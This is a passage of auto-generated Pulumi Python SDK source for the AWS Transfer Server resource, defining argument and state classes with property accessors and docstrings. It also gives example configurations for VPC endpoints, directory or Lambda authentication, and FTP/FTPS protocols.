:param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
:param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
:param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
:param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if directory_id is not None:
pulumi.set(__self__, "directory_id", directory_id)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if endpoint_details is not None:
pulumi.set(__self__, "endpoint_details", endpoint_details)
if endpoint_type is not None:
pulumi.set(__self__, "endpoint_type", endpoint_type)
if force_destroy is not None:
pulumi.set(__self__, "force_destroy", force_destroy)
if function is not None:
pulumi.set(__self__, "function", function)
if host_key is not None:
pulumi.set(__self__, "host_key", host_key)
if identity_provider_type is not None:
pulumi.set(__self__, "identity_provider_type", identity_provider_type)
if invocation_role is not None:
pulumi.set(__self__, "invocation_role", invocation_role)
if logging_role is not None:
pulumi.set(__self__, "logging_role", logging_role)
if protocols is not None:
pulumi.set(__self__, "protocols", protocols)
if security_policy_name is not None:
pulumi.set(__self__, "security_policy_name", security_policy_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
"""
return pulumi.get(self, "certificate")
@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate", value)
@property
@pulumi.getter(name="directoryId")
def directory_id(self) -> Optional[pulumi.Input[str]]:
"""
The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
"""
return pulumi.get(self, "directory_id")
@directory_id.setter
def directory_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "directory_id", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="endpointDetails")
def endpoint_details(self) -> Optional[pulumi.Input['ServerEndpointDetailsArgs']]:
"""
The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
"""
return pulumi.get(self, "endpoint_details")
@endpoint_details.setter
def endpoint_details(self, value: Optional[pulumi.Input['ServerEndpointDetailsArgs']]):
pulumi.set(self, "endpoint_details", value)
@property
@pulumi.getter(name="endpointType")
def endpoint_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
"""
return pulumi.get(self, "endpoint_type")
@endpoint_type.setter
def endpoint_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint_type", value)
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
"""
return pulumi.get(self, "force_destroy")
@force_destroy.setter
def force_destroy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_destroy", value)
@property
@pulumi.getter
def function(self) -> Optional[pulumi.Input[str]]:
"""
The ARN for a lambda function to use for the Identity provider.
"""
return pulumi.get(self, "function")
@function.setter
def function(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function", value)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> Optional[pulumi.Input[str]]:
"""
RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
"""
return pulumi.get(self, "host_key")
@host_key.setter
def host_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_key", value)
@property
@pulumi.getter(name="identityProviderType")
def identity_provider_type(self) -> Optional[pulumi.Input[str]]:
"""
The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
"""
return pulumi.get(self, "identity_provider_type")
@identity_provider_type.setter
def identity_provider_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_provider_type", value)
@property
@pulumi.getter(name="invocationRole")
def invocation_role(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
"""
return pulumi.get(self, "invocation_role")
@invocation_role.setter
def invocation_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "invocation_role", value)
@property
@pulumi.getter(name="loggingRole")
def logging_role(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
"""
return pulumi.get(self, "logging_role")
@logging_role.setter
def logging_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logging_role", value)
@property
@pulumi.getter
def protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
"""
return pulumi.get(self, "protocols")
@protocols.setter
def protocols(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "protocols", value)
@property
@pulumi.getter(name="securityPolicyName")
def security_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
"""
return pulumi.get(self, "security_policy_name")
@security_policy_name.setter
def security_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_policy_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
- URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class _ServerState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
certificate: Optional[pulumi.Input[str]] = None,
directory_id: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_details: Optional[pulumi.Input['ServerEndpointDetailsArgs']] = None,
endpoint_type: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
function: Optional[pulumi.Input[str]] = None,
host_key: Optional[pulumi.Input[str]] = None,
host_key_fingerprint: Optional[pulumi.Input[str]] = None,
identity_provider_type: Optional[pulumi.Input[str]] = None,
invocation_role: Optional[pulumi.Input[str]] = None,
logging_role: Optional[pulumi.Input[str]] = None,
protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
security_policy_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Server resources.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of Transfer Server
:param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
:param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
:param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
:param pulumi.Input[str] endpoint: The endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
:param pulumi.Input['ServerEndpointDetailsArgs'] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
:param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
:param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
:param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
:param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
:param pulumi.Input[str] host_key_fingerprint: This value contains the message-digest algorithm (MD5) hash of the server's host key. This value is equivalent to the output of the `ssh-keygen -l -E md5 -f my-new-server-key` command.
:param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
:param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
:param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
:param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
:param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if directory_id is not None:
pulumi.set(__self__, "directory_id", directory_id)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if endpoint_details is not None:
pulumi.set(__self__, "endpoint_details", endpoint_details)
if endpoint_type is not None:
pulumi.set(__self__, "endpoint_type", endpoint_type)
if force_destroy is not None:
pulumi.set(__self__, "force_destroy", force_destroy)
if function is not None:
pulumi.set(__self__, "function", function)
if host_key is not None:
pulumi.set(__self__, "host_key", host_key)
if host_key_fingerprint is not None:
pulumi.set(__self__, "host_key_fingerprint", host_key_fingerprint)
if identity_provider_type is not None:
pulumi.set(__self__, "identity_provider_type", identity_provider_type)
if invocation_role is not None:
pulumi.set(__self__, "invocation_role", invocation_role)
if logging_role is not None:
pulumi.set(__self__, "logging_role", logging_role)
if protocols is not None:
pulumi.set(__self__, "protocols", protocols)
if security_policy_name is not None:
pulumi.set(__self__, "security_policy_name", security_policy_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of Transfer Server
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
"""
return pulumi.get(self, "certificate")
@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate", value)
@property
@pulumi.getter(name="directoryId")
def directory_id(self) -> Optional[pulumi.Input[str]]:
"""
The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
"""
return pulumi.get(self, "directory_id")
@directory_id.setter
def directory_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "directory_id", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="endpointDetails")
def endpoint_details(self) -> Optional[pulumi.Input['ServerEndpointDetailsArgs']]:
"""
The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
"""
return pulumi.get(self, "endpoint_details")
@endpoint_details.setter
def endpoint_details(self, value: Optional[pulumi.Input['ServerEndpointDetailsArgs']]):
pulumi.set(self, "endpoint_details", value)
@property
@pulumi.getter(name="endpointType")
def endpoint_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
"""
return pulumi.get(self, "endpoint_type")
@endpoint_type.setter
def endpoint_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint_type", value)
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
"""
return pulumi.get(self, "force_destroy")
@force_destroy.setter
def force_destroy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_destroy", value)
@property
@pulumi.getter
def function(self) -> Optional[pulumi.Input[str]]:
"""
The ARN for a lambda function to use for the Identity provider.
"""
return pulumi.get(self, "function")
@function.setter
def function(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function", value)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> Optional[pulumi.Input[str]]:
"""
RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
"""
return pulumi.get(self, "host_key")
@host_key.setter
def host_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_key", value)
@property
@pulumi.getter(name="hostKeyFingerprint")
def host_key_fingerprint(self) -> Optional[pulumi.Input[str]]:
"""
This value contains the message-digest algorithm (MD5) hash of the server's host key. This value is equivalent to the output of the `ssh-keygen -l -E md5 -f my-new-server-key` command.
"""
return pulumi.get(self, "host_key_fingerprint")
@host_key_fingerprint.setter
def host_key_fingerprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_key_fingerprint", value)
@property
@pulumi.getter(name="identityProviderType")
def identity_provider_type(self) -> Optional[pulumi.Input[str]]:
"""
The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
"""
return pulumi.get(self, "identity_provider_type")
@identity_provider_type.setter
def identity_provider_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_provider_type", value)
@property
@pulumi.getter(name="invocationRole")
def invocation_role(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
"""
return pulumi.get(self, "invocation_role")
@invocation_role.setter
def invocation_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "invocation_role", value)
@property
@pulumi.getter(name="loggingRole")
def logging_role(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
"""
return pulumi.get(self, "logging_role")
@logging_role.setter
def logging_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logging_role", value)
@property
@pulumi.getter
def protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
"""
return pulumi.get(self, "protocols")
@protocols.setter
def protocols(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "protocols", value)
@property
@pulumi.getter(name="securityPolicyName")
def security_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
"""
return pulumi.get(self, "security_policy_name")
@security_policy_name.setter
def security_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_policy_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
- URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
class Server(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
certificate: Optional[pulumi.Input[str]] = None,
directory_id: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
endpoint_details: Optional[pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']]] = None,
endpoint_type: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
function: Optional[pulumi.Input[str]] = None,
host_key: Optional[pulumi.Input[str]] = None,
identity_provider_type: Optional[pulumi.Input[str]] = None,
invocation_role: Optional[pulumi.Input[str]] = None,
logging_role: Optional[pulumi.Input[str]] = None,
protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
security_policy_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a AWS Transfer Server resource.
> **NOTE on AWS IAM permissions:** If the `endpoint_type` is set to `VPC`, the `ec2:DescribeVpcEndpoints` and `ec2:ModifyVpcEndpoint` [actions](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonec2.html#amazonec2-actions-as-permissions) are used.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example", tags={
"Name": "Example",
})
```
### Security Policy Name
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example", security_policy_name="TransferSecurityPolicy-2020-06")
```
### VPC Endpoint
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
endpoint_type="VPC",
endpoint_details=aws.transfer.ServerEndpointDetailsArgs(
address_allocation_ids=[aws_eip["example"]["id"]],
subnet_ids=[aws_subnet["example"]["id"]],
vpc_id=aws_vpc["example"]["id"],
))
```
### AWS Directory authentication
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
identity_provider_type="AWS_DIRECTORY_SERVICE",
directory_id=aws_directory_service_directory["example"]["id"])
```
### AWS Lambda authentication
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
identity_provider_type="AWS_LAMBDA",
function=aws_lambda_identity_provider["example"]["arn"])
```
### Protocols
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
endpoint_type="VPC",
endpoint_details=aws.transfer.ServerEndpointDetailsArgs(
subnet_ids=[aws_subnet["example"]["id"]],
vpc_id=aws_vpc["example"]["id"],
),
protocols=[
"FTP",
"FTPS",
],
certificate=aws_acm_certificate["example"]["arn"],
identity_provider_type="API_GATEWAY",
url=f"{aws_api_gateway_deployment['example']['invoke_url']}{aws_api_gateway_resource['example']['path']}")
```
## Import
Transfer Servers can be imported using the `server id`, e.g.,
```sh
$ pulumi import aws:transfer/server:Server example s-12345678
```
Certain resource arguments, such as `host_key`, cannot be read via the API and imported into the provider. This provider will display a difference for these arguments the first run after import if declared in the provider configuration for an imported resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
:param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
:param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
:param pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
:param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
:param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
:param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
:param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
:param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
:param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
:param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
:param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ServerArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a AWS Transfer Server resource.
> **NOTE on AWS IAM permissions:** If the `endpoint_type` is set to `VPC`, the `ec2:DescribeVpcEndpoints` and `ec2:ModifyVpcEndpoint` [actions](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonec2.html#amazonec2-actions-as-permissions) are used.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example", tags={
"Name": "Example",
})
```
### Security Policy Name
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example", security_policy_name="TransferSecurityPolicy-2020-06")
```
### VPC Endpoint
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
endpoint_type="VPC",
endpoint_details=aws.transfer.ServerEndpointDetailsArgs(
address_allocation_ids=[aws_eip["example"]["id"]],
subnet_ids=[aws_subnet["example"]["id"]],
vpc_id=aws_vpc["example"]["id"],
))
```
### AWS Directory authentication
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
identity_provider_type="AWS_DIRECTORY_SERVICE",
directory_id=aws_directory_service_directory["example"]["id"])
```
### AWS Lambda authentication
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
identity_provider_type="AWS_LAMBDA",
function=aws_lambda_identity_provider["example"]["arn"])
```
### Protocols
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
endpoint_type="VPC",
endpoint_details=aws.transfer.ServerEndpointDetailsArgs(
subnet_ids=[aws_subnet["example"]["id"]],
vpc_id=aws_vpc["example"]["id"],
),
protocols=[
"FTP",
"FTPS",
],
certificate=aws_acm_certificate["example"]["arn"],
identity_provider_type="API_GATEWAY",
url=f"{aws_api_gateway_deployment['example']['invoke_url']}{aws_api_gateway_resource['example']['path']}")
```
## Import
Transfer Servers can be imported using the `server id`, e.g.,
```sh
$ pulumi import aws:transfer/server:Server example s-12345678
```
